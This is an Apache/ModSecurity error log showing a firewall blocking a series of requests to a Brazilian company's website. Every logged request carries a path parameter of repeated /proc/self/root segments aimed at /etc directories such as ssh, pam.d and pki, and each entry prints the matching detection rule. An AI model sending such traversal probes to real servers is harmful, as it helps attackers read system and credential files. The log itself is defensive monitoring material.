[Mon Mar 16 17:13:21.595113 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:35796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkYf9ocpUE4ed4uDwI9wAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:23.891212 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.243.203:35810] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkY8_BxrYCr4hPDw8AZAAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:25.183278 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.243.203:35824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkZaTCbgAP5jq5TehDGAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:26.511542 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:35840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkZrysWC90G-1nBrBaNwAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:27.842825 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:35856] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkZ46lpbStxTqkSkuArQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:28.998263 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:35860] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkaI6lpbStxTqkSkuArgAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:30.343515 2026] [:error] [pid 29802:tid 140411574073088] [client 74.7.243.203:32806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkas_BxrYCr4hPDw8AZwAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:31.562800 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.243.203:32822] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhka8_BxrYCr4hPDw8AaQAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:33.002997 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.243.203:32830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkbdSswJuvopo3lOh1awAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:34.240803 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:32838] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkbo6lpbStxTqkSkuAsAAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:35.444850 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.243.203:32846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkb6QpVkWug9HeOt9L6wAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:36.750450 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:32860] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkcLABkC4fWIHEf8ELXwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:37.960283 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.243.203:32874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkcVajLEzk2WiQ-10o3wAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:39.271214 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.243.203:32890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkc1ajLEzk2WiQ-10o4QAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:39.578331 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:35470] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkc7ABkC4fWIHEf8ELYgAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:40.477992 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:33100] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkdKQpVkWug9HeOt9L7AAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:41.670807 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.243.203:33102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkdVajLEzk2WiQ-10o4gAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:43.015862 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:33118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkd7ABkC4fWIHEf8ELZAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:44.263123 2026] [:error] [pid 29507:tid 140411607643904] [client 74.7.243.203:33122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkeEr9dMAiw-8KANNdxwAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:45.587211 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:33126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkebABkC4fWIHEf8ELZQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:13:46.455689 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:49318] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkev9ocpUE4ed4uDwI_wAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:48.017130 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:33132] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkfLABkC4fWIHEf8ELZwAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
